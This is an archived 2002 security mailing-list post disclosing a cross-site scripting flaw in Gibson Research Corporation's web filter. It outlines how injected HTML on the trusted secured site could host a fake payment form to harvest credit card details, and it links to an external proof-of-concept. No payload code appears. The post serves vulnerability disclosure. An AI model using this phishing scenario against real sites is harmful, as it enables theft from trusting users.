Classic Cross Site Scripting: Gibson Research Corporation

From: http-equiv@excite.com
Date: 05/01/02


Date:         Wed, 1 May 2002 16:34:47 -0000
From: "http-equiv@excite.com" <http-equiv@MALWARE.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

Wednesday, May 01, 2002

The following represents a classic [fitting] working example of the
dangers of Cross Site Scripting.

[see: http://www.cert.org/advisories/CA-2000-02.html
http://www.cert.org/archive/pdf/cross_site_scripting.pdf]

Gibson Research Corporation http://www.grc.com is an interesting site
covering a wide variety of security topics for newcomers. Cursory
research suggests that it enjoys a substantial loyal following who
trust it implicitly.

The problem is two-fold:

1. The site has a web based discussion forum
2. The site has a custom 'filter', the so-called: "Gibson Research
Corporation's IIS Advanced Prophylactic Filter"

This custom 'filter' is supposed to protect the server
from 'malicious abuse' and both 'detect and block' invalid requests
submitted to the server:

http://www.grc.com/apf/

[screen shot: http://www.malware.com/flitty.png 25KB]

Unfortunately, what it actually does is allow us to inject our own
html code through grc.com's secured server. This is particularly
ticklish as it does not take much to conjure up a scenario where we
construct a 'fake' e-commerce page, say peddling a book or 'gadget'
download and simply invite the loyal following to go and submit their
credit card details to our custom form.

The site grc.com well known and trusted. The page is on a secured
server with valid certificates.

Ripe For Picking™

Crude Working example:

note: custom crafted for Internet Explorer 5.5 and 6

http://www.malware.com/grc.html

[screen shot: http://www.malware.com/lucre.png 11KB]

Notes:

1. Watch where you "point and click". It's all smoke and mirrors out
there.
2. 3 mail messages within 72 hours to support @ grc.com remain
unanswered to date.

End Call

--
http://www.malware.com



Relevant Pages

  • Classic Cross Site Scripting: Gibson Research Corporation
    ... Gibson Research Corporation http://www.grc.com is an interesting site ... The site has a custom 'filter', ... Corporation's IIS Advanced Prophylactic Filter" ... This custom 'filter' is supposed to protect the server ...
    (Vuln-Dev)
  • Classic Cross Site Scripting: Gibson Research Corporation
    ... Gibson Research Corporation http://www.grc.com is an interesting site ... The site has a custom 'filter', ... Corporation's IIS Advanced Prophylactic Filter" ... This custom 'filter' is supposed to protect the server ...
    (Bugtraq)
  • Classic Cross Site Scripting: Gibson Research Corporation
    ... Gibson Research Corporation http://www.grc.com is an interesting site ... The site has a custom 'filter', ... This custom 'filter' is supposed to protect the server ... Demonstrate your knowledge and understanding of core IT Security, ...
    (NT-Bugtraq)
  • Re: RunTime Error - After my web site running 2 or 3 days
    ... Make sure the server 'EXPORTNETWORK.exortcanada.local' is ... The application-specific permission settings do not grant Local Activation ... custom error settings for this application prevent the details of the ... This tag should then have its ...
    (microsoft.public.dotnet.languages.csharp)
  • Cannot Access Sharepoint Central Administrator
    ... An application error occurred on the server. ... "web.config" configuration file located in the root directory of the current ... The current error page you are seeing can be replaced by a custom ... Thread account name: NT AUTHORITY\NETWORK SERVICE Is impersonating: ...
    (microsoft.public.sharepoint.windowsservices)